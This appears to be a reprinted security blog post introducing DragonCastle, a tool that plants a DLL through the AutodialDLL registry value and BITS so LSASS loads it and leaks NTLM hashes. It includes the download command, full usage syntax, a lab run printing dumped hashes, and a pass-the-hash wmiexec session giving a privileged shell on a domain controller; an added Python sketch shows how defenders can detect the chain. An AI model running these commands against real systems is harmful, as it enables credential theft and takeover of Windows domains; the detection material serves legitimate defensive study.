How to Extract NTLM Hashes from the LSASS Process with DragonCastle


About DragonCastle

DragonCastle is a security tool that combines the AutodialDLL lateral-movement technique with a Security Support Provider (SSP). It is intended to help researchers extract NTLM hashes from the LSASS process.

The tool uploads a DLL to the target host, then enables the Remote Registry service so that it can modify the AutodialDLL registry entry and start (or restart) the BITS service. The svchost process hosting BITS loads the uploaded DLL; the DLL resets AutodialDLL to its default value and issues an RPC request that forces LSASS to load the same DLL as a Security Support Provider. Once LSASS has loaded the DLL, the DLL searches the process memory to extract the NTLM hashes and the key/IV.
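From the defender's side, the chain described above leaves three host-level traces that can be correlated: the WinSock2 AutodialDLL registry value being rewritten to a path outside System32, the Remote Registry and BITS services being started, and lsass.exe loading an image from outside System32. The following Python sketch is an added example and is not part of DragonCastle or of this post. The registry location and default value of AutodialDLL, the record field names, and the log records themselves are assumptions modelled on Sysmon (Event ID 13 and 7) and System-log (7036) events, constructed for this example; the planted path `c:\dump.dll` is the one used in the usage example below.

```python
"""Correlate the host signals left by an AutodialDLL -> BITS -> LSASS SSP chain.

Added example, not part of the DragonCastle project. Field names and log
records are assumptions modelled on Sysmon / System-log events.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Assumed well-known registry location and default value of AutodialDLL.
AUTODIAL_KEY = r"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL"
DEFAULT_AUTODIAL = r"%systemroot%\system32\rasadhlp.dll"
SYSTEM32 = r"c:\windows\system32"


@dataclass
class Event:
    ts: datetime
    host: str
    kind: str          # "registry_set", "service_start" or "image_load"
    fields: Dict[str, str]


def is_system32(path: str) -> bool:
    """True if the path (after expanding %systemroot%) lives under System32."""
    p = path.lower().replace("%systemroot%", r"c:\windows")
    return p.startswith(SYSTEM32 + "\\")


def suspicious(ev: Event) -> Optional[str]:
    """Tag an event if it is one of the three chain signals, else None."""
    if ev.kind == "registry_set":
        if ev.fields["target"].lower() == AUTODIAL_KEY.lower() and not is_system32(ev.fields["value"]):
            return "autodialdll_rewrite"
    elif ev.kind == "service_start":
        if ev.fields["service"].lower() in {"bits", "remoteregistry"}:
            return "service_start:" + ev.fields["service"].lower()
    elif ev.kind == "image_load":
        if ev.fields["image"].lower().endswith("\\lsass.exe") and not is_system32(ev.fields["loaded"]):
            return "lsass_nonsystem_dll"
    return None


def correlate(events: List[Event], window: timedelta = timedelta(minutes=5)) -> List[dict]:
    """Report hosts where an AutodialDLL rewrite is accompanied, within +/- window,
    by lsass.exe loading a DLL from outside System32."""
    by_host: Dict[str, list] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        tag = suspicious(ev)
        if tag:
            by_host.setdefault(ev.host, []).append((ev.ts, tag, ev))

    findings = []
    for host, tagged in by_host.items():
        for ts0, tag0, ev0 in tagged:
            if tag0 != "autodialdll_rewrite":
                continue
            nearby = [t for t in tagged if ts0 - window <= t[0] <= ts0 + window]
            kinds = {t[1].split(":")[0] for t in nearby}
            if "lsass_nonsystem_dll" in kinds:
                findings.append({
                    "host": host,
                    "start": ts0,
                    "planted_dll": ev0.fields["value"],
                    "signals": sorted(kinds),
                    "service_starts": sorted(t[1].split(":")[1] for t in nearby
                                             if t[1].startswith("service_start")),
                })
    return findings


def sample_events() -> List[Event]:
    """Constructed records: one host showing the full chain, one benign host."""
    t = datetime(2022, 4, 1, 10, 0, 0)
    s = lambda n: t + timedelta(seconds=n)
    return [
        Event(s(0), "srv01", "service_start", {"service": "RemoteRegistry"}),
        Event(s(5), "srv01", "registry_set", {"target": AUTODIAL_KEY, "value": r"c:\dump.dll"}),
        Event(s(12), "srv01", "service_start", {"service": "BITS"}),
        Event(s(13), "srv01", "image_load", {"image": r"C:\Windows\System32\svchost.exe", "loaded": r"c:\dump.dll"}),
        Event(s(14), "srv01", "registry_set", {"target": AUTODIAL_KEY, "value": DEFAULT_AUTODIAL}),
        Event(s(15), "srv01", "image_load", {"image": r"C:\Windows\System32\lsass.exe", "loaded": r"c:\dump.dll"}),
        # Benign host: BITS starts on its own, LSASS loads a genuine SSP from System32.
        Event(s(0), "ws07", "service_start", {"service": "BITS"}),
        Event(s(2), "ws07", "image_load", {"image": r"C:\Windows\System32\lsass.exe", "loaded": r"C:\Windows\System32\msv1_0.dll"}),
    ]


if __name__ == "__main__":
    for f in correlate(sample_events()):
        print(f"{f['host']}: AutodialDLL -> {f['planted_dll']} at {f['start']}, "
              f"signals={f['signals']}, services={f['service_starts']}")
```

The reset of AutodialDLL back to its default (the second registry_set record) is deliberately not flagged, since the value is under System32; the rewrite that preceded it is what carries the signal, so a detection keyed only on the current registry value would miss a chain that cleans up after itself.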

Supported operating system versions

Operating system version            Support status
Windows 10 version 21H2
Windows 10 version 21H1             Supported
Windows 10 version 20H2             Supported
Windows 10 version 20H1 (2004)      Supported
Windows 10 version 1909             Supported
Windows 10 version 1903             Supported
Windows 10 version 1809             Supported
Windows 10 version 1803             Supported
Windows 10 version 1709             Supported
Windows 10 version 1703             Supported
Windows 10 version 1607             Supported
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

Downloading the tool

The tool requires a Python 3 environment, so first install and configure Python 3 on the local machine. Clone the project source with the following command:

git clone https://github.com/mdsecactivebreach/DragonCastle.git

Usage

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -h

DragonCastle - @TheXC3LL

usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
  -h, --help             show this help message and exit
  -u USERNAME, --username USERNAME    valid username
  -p PASSWORD, --password PASSWORD    valid password
  -d DOMAIN, --domain DOMAIN    valid domain
  -hashes [LMHASH]:NTHASH      NT/LM hashes
  -no-pass              don't ask for password
  -k                    use Kerberos authentication
  -dc-ip ip address     IP address of the domain controller
  -target-ip ip address   IP address of the target machine
  -local-dll dll to plant    local path of the DLL to upload
  -remote-dll dll location   remote path written to the AutodialDLL registry value

Usage example

The Windows server is at 192.168.56.20 and the domain controller at 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll

DragonCastle - @TheXC3LL

[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
[+] Deleting DLL

[^] Have a nice day!

psyconauta@insulanova:~/Research/dragoncastle|⇒  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Project page

DragonCastle: [GitHub link]

References

https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/

https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/

https://adepts.of0x.cc/physical-graffiti-lsass/

https://blog.xpnsec.com/exploring-mimikatz-part-2/

https://twitter.com/TheXC3LL

Author: Alpha_h4ck

Reprinted from FreeBuf.COM
